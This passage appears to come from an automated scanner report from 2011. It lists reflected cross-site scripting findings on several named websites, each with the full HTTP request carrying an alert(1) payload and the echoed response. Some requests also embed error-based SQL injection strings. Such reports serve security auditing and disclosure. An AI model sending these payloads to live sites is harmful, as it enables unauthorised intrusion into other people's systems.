       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_street2" value="8bf1b\"><script>alert(1)</script>a77f499cb1c" style="width:300px;">
...[SNIP]...

5.101. http://www.manitu.de/shop/ [billc_title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4023"><script>alert(1)</script>7e7e69e7b9f was submitted in the billc_title parameter. This input was echoed as b4023\"><script>alert(1)</script>7e7e69e7b9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=b4023"><script>alert(1)</script>7e7e69e7b9f&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:29 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_title" value="b4023\"><script>alert(1)</script>7e7e69e7b9f" style="width:100px;">
...[SNIP]...

5.102. http://www.manitu.de/shop/ [billc_zipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_zipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f9a2"><script>alert(1)</script>9f71fef3960 was submitted in the billc_zipcode parameter. This input was echoed as 3f9a2\"><script>alert(1)</script>9f71fef3960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=3f9a2"><script>alert(1)</script>9f71fef3960&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:48 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16981

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_zipcode" value="3f9a2\"><script>alert(1)</script>9f71fef3960" size="5" style="width:50px;">
...[SNIP]...

5.103. http://www.my-happyfeet.com/cart.asp [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabd5</script><script>alert(1)</script>7b31a895f05 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:10:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 23932
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ked) alert("You haven't selected any items.");
   return(ischecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
...[SNIP]...

5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f00f</script><script>alert(1)</script>5bebd3dd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24835
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
koutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkcheck
...[SNIP]...

5.105. http://www.my-happyfeet.com/cart.asp [refurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a19d</script><script>alert(1)</script>4cbf628a43b was submitted in the refurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24869
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ckoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkchecked
...[SNIP]...

5.106. http://www.nutter.com/careers.php [CareerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CareerID request parameter is copied into the HTML document as plain text between tags. The payload d9278<script>alert(1)</script>0b50050f2f4 was submitted in the CareerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17d9278<script>alert(1)</script>0b50050f2f4&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:09:11 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 16006

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<BR>sql: SELECT CareerTitle FROM careers WHERE CareerID=17d9278<script>alert(1)</script>0b50050f2f4
<div id="NarrativeText">
...[SNIP]...

5.107. http://www.nutter.com/careers.php [CategoryID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 98e53<script>alert(1)</script>438881afcf7 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))98e53<script>alert(1)</script>438881afcf7&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:37 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15919

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<br />
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '98e53<script>alert(1)</script>438881afcf7 LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

5.108. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d50b%3balert(1)//7f28521d945 was submitted in the bid parameter. This input was echoed as 6d50b;alert(1)//7f28521d945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43841
Connection: Keep-alive
Via: 1.1 AN-0016020122637050


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL21236d50b;alert(1)//7f28521d945 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByTagName('head')
...[SNIP]...

5.109. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f8c"%3balert(1)//8ec3b57aa3 was submitted in the _flowId parameter. This input was echoed as 99f8c";alert(1)//8ec3b57aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))99f8c"%3balert(1)//8ec3b57aa3 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
nt(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))99f8c";alert(1)//8ec3b57aa3' found; the flows available are: array<String>
...[SNIP]...

5.110. http://www.superpages.com/inc/social/soc.php [cg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc74"%3balert(1)//9a46c961ede was submitted in the cg parameter. This input was echoed as dbc74";alert(1)//9a46c961ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9dbc74"%3balert(1)//9a46c961ede&ml=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:38:58 GMT
Server: Unspecified
Vary: Host
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Fri, 25-Mar-2011 19:53:58 GMT;path=/;httponly
Content-Length: 15089

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...
<a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=9dbc74";alert(1)//9a46c961ede&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\">
...[SNIP]...

5.111. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 76ef5--><script>alert(1)</script>094fe3529e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:26:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: eLFqGawSrRQAAGXGG2oAAAAM
SCRIPT_URL: /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account76ef5-->
...[SNIP]...

5.112. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9d9e8--><script>alert(1)</script>cf4dc32b2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
FCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: mFwE36wSrSgAAEYWqmIAAAAU
SCRIPT_URL: /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account/login9d9e8-->
...[SNIP]...

5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 55d6e--><script>alert(1)</script>83406a853e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp?55d6e--><script>alert(1)</script>83406a853e1=1 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:51 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 37104


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=0&itemType=ErrorPage&55d6e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E83406a853e1=1&status=404&itemID=0&itemType=ErrorPage&status=404&55d6e--><script>alert(1)</script>83406a853e1=1
Session ID: eDwn-UFCx4o7 (from cookie)

Parameters:
ruleID = 8
